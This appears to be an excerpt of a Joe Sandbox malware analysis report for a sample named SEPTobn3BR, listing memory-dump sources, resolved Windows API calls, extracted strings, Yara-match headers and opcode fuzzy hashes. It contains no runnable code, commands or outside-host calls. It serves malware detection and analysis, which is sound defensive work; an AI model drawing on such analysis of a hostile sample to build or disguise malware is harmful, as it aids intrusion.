                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction ID: 13709723ad36464cc818f37a291098979f437ae666acfbd3aaa7706019089697
                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction Fuzzy Hash: 36112B7728508247D604CA6DDCB62BBE795EBC712872D52BAD0418BB98D762E38CF500
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                                                              • Instruction ID: bf7171e84a28964780af584fc0c49094966ce046d9bd4623198fa82c51a2eec4
                                                              • Opcode Fuzzy Hash: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                                                              • Instruction Fuzzy Hash: 37F058332102019FE661CA5AE8C8B76B3AAFFA0666F6A04A9D144B7162D360ED44CA50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b675ef751003dd94a4a5a225bc312582345a8ac16cea9a7d3627edb1bededd63
                                                              • Instruction ID: c5effa18576a7eb6209ec52599d90799d00d0122e1d3b316ef62c0d64d3c323a
                                                              • Opcode Fuzzy Hash: b675ef751003dd94a4a5a225bc312582345a8ac16cea9a7d3627edb1bededd63
                                                              • Instruction Fuzzy Hash: D0E0B631000658EBCF227F64DD48A583B6AEB40796F490464F9098B633CF75D95ADA84
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B8D225
                                                                • Part of subcall function 02B8D1F0: GetProcAddress.KERNEL32(00000000), ref: 02B8D209
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                              • API String ID: 1646373207-1918263038
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: xF$xF
                                                              • API String ID: 269201875-3476023522
                                                              APIs
                                                              • _free.LIBCMT ref: 02C2FA6B
                                                              • ___free_lconv_mon.LIBCMT ref: 02C2FA76
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2EC8B
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2EC9D
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ECAF
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ECC1
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ECD3
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ECE5
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ECF7
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ED09
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ED1B
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ED2D
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ED3F
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ED51
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ED63
                                                              • _free.LIBCMT ref: 02C2FA8D
                                                              • _free.LIBCMT ref: 02C2FAA2
                                                              • _free.LIBCMT ref: 02C2FAAD
                                                              • _free.LIBCMT ref: 02C2FACF
                                                              • _free.LIBCMT ref: 02C2FAE2
                                                              • _free.LIBCMT ref: 02C2FAF0
                                                              • _free.LIBCMT ref: 02C2FAFB
                                                              • _free.LIBCMT ref: 02C2FB33
                                                              • _free.LIBCMT ref: 02C2FB3A
                                                              • _free.LIBCMT ref: 02C2FB57
                                                              • _free.LIBCMT ref: 02C2FB6F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$___free_lconv_mon
                                                              • String ID: xF
                                                              • API String ID: 3658870901-2169143296
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B96E66
                                                              • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B96E77
                                                              • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B96E87
                                                              • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B96E97
                                                              • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B96EA7
                                                              • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B96EB7
                                                              • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02B96EC7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                              • API String ID: 667068680-2233174745
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$___from_strstr_to_strchr_wcschr
                                                              • String ID:
                                                              • API String ID: 1963305004-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              APIs
                                                              • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B828CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                              • API String ID: 2030045667-32948583
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: $.F$6$t<F$!G$!G
                                                              • API String ID: 176396367-201192458
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: xF
                                                              • API String ID: 269201875-2169143296
                                                              Strings
                                                              • An unexpected memory leak has occurred. , xrefs: 02B82690
                                                              • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B82849
                                                              • The unexpected small block leaks are:, xrefs: 02B82707
                                                              • , xrefs: 02B82814
                                                              • Unexpected Memory Leak, xrefs: 02B828C0
                                                              • bytes: , xrefs: 02B8275D
                                                              • 7, xrefs: 02B826A1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                              • API String ID: 0-2723507874
                                                              • Opcode ID: 53696ce3e54dfd0197f7c9892426ec35260cea45545be7c2126b7a9ac19ae4bb
                                                              • Instruction ID: 5287417ca808ddfeff90118f553c6ed405c537c187686baa2bcbac8853537036
                                                              • Opcode Fuzzy Hash: 53696ce3e54dfd0197f7c9892426ec35260cea45545be7c2126b7a9ac19ae4bb
                                                              • Instruction Fuzzy Hash: 5B71C034A042D88FEF21BA2CCC84BD9BAE5EB09740F1041E5E94DEB281DB758AC5CF51
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$_abort_memcmp
                                                              • String ID: C
                                                              • API String ID: 137591632-1037565863
                                                              • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                                              • Instruction ID: a6c9c89575ddbfcb162da8d82e2fb119e10b2f6838e81f8411973ff6430dea3b
                                                              • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                                              • Instruction Fuzzy Hash: 33B15B75A016699FDB24DF18C888BADB7B5FF48304F5041EAD809A7350EB75AE98CF40
                                                              APIs
                                                              • GetThreadLocale.KERNEL32(00000000,02B8C013,?,?,00000000,00000000), ref: 02B8BD7E
                                                                • Part of subcall function 02B8A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Locale$InfoThread
                                                              • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                              • API String ID: 4232894706-2493093252
                                                              • Opcode ID: 0112cd8a0600c2f5f8463af608924ab94a1c249eef71fab711c2567a4f43b4a7
                                                              • Instruction ID: c5fa57966ade0b56cb1a458e1b7017eb423cfe53864a923d7e3de9709bfc1ab0
                                                              • Opcode Fuzzy Hash: 0112cd8a0600c2f5f8463af608924ab94a1c249eef71fab711c2567a4f43b4a7
                                                              • Instruction Fuzzy Hash: D0618F39B001499BDB05FBB4D890ADFBBBBDF88340F5098F6E119AB641DA34D905DB60
                                                              APIs
                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9AE40
                                                              • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B9AE57
                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9AEEB
                                                              • IsBadReadPtr.KERNEL32(?,00000002), ref: 02B9AEF7
                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B9AF0B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Read$HandleModule
                                                              • String ID: KernelBase$LoadLibraryExA
                                                              • API String ID: 2226866862-113032527
                                                              • Opcode ID: ca1fb2cd571423cc2eb2c176b15433eddfa9c5593db0a2289458904e13997d3b
                                                              • Instruction ID: 2faddc9b46a8df2df9eb2a9c23cd56d7f685c8f3ba8683e07fda3a656218678a
                                                              • Opcode Fuzzy Hash: ca1fb2cd571423cc2eb2c176b15433eddfa9c5593db0a2289458904e13997d3b
                                                              • Instruction Fuzzy Hash: 01314FB2A40705BBDF20DF68DC85F9A77ACEF05364F1045A4FA58EB280D770A950CBA4
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?,02BE07C8,?,?,02BAD7A8,02B8655D,02BAC30D), ref: 02B84365
                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?,02BE07C8,?,?,02BAD7A8,02B8655D,02BAC30D), ref: 02B8436B
                                                              • GetStdHandle.KERNEL32(000000F5,02B843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?,02BE07C8), ref: 02B84380
                                                              • WriteFile.KERNEL32(00000000,000000F5,02B843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?), ref: 02B84386
                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B843A4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileHandleWrite$Message
                                                              • String ID: Error$Runtime error at 00000000
                                                              • API String ID: 1570097196-2970929446
                                                              • Opcode ID: 7151a556e8287c482eefed0fdd0200f8faef3f0bb8349286e844497f575f66b4
                                                              • Instruction ID: c4b095727fee88f413ee093a6f8cc27ca9565a40b4b4b3c70ea8e5bb2a31ce63
                                                              • Opcode Fuzzy Hash: 7151a556e8287c482eefed0fdd0200f8faef3f0bb8349286e844497f575f66b4
                                                              • Instruction Fuzzy Hash: 8EF02470AD6302B9FB10B664AC16FA9332C8700F54F508AD4B23CA90D0D7A090C5CB26
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: 8:G
                                                              • API String ID: 269201875-405301104
                                                              • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                                              • Instruction ID: 3699a3f12da4b0261a486a328ee9cad72de2f1764164bd8ca2c21f407f7a7d90
                                                              • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                                              • Instruction Fuzzy Hash: 4241E476A002249FCB14EF78C880A5AB7E6EF89314B1541A9D905FB381DB71AA05DB51
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                              • Instruction ID: 12b31b9a593537ddf086529712a0a0cdf887da533e3c68510401c381837a4957
                                                              • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                              • Instruction Fuzzy Hash: 50116371540B2CBAD520BBB1CD05FCB7BAE5F00700F804819B69E66491DE79B50DAF50
                                                              APIs
                                                                • Part of subcall function 02B8ACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B8ACE1
                                                                • Part of subcall function 02B8ACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B8AD05
                                                                • Part of subcall function 02B8ACC4: GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B8AD20
                                                                • Part of subcall function 02B8ACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B8ADB6
                                                              • CharToOemA.USER32(?,?), ref: 02B8AE83
                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEA0
                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEA6
                                                              • GetStdHandle.KERNEL32(000000F4,02B8AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEBB
                                                              • WriteFile.KERNEL32(00000000,000000F4,02B8AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEC1
                                                              • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B8AEE3
                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B8AEF9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                              • String ID:
                                                              • API String ID: 185507032-0
                                                              • Opcode ID: c82d30bce22976e294cee82e6a78cb1d9155dfa4e1a66fd4e1114cac8f7cc825
                                                              • Instruction ID: 0f745b5eed8af571ed9bc69d3115d836435d580107718c0f5a7e82c8a9a92695
                                                              • Opcode Fuzzy Hash: c82d30bce22976e294cee82e6a78cb1d9155dfa4e1a66fd4e1114cac8f7cc825
                                                              • Instruction Fuzzy Hash: D4117CB6584244BAD200FBA4CC81FDB7BEDAB45700F4009A6B748DB0E0EA74E944CF62
                                                              APIs
                                                              • __allrem.LIBCMT ref: 02C19F95
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C19FB1
                                                              • __allrem.LIBCMT ref: 02C19FC8
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C19FE6
                                                              • __allrem.LIBCMT ref: 02C19FFD
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C1A01B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
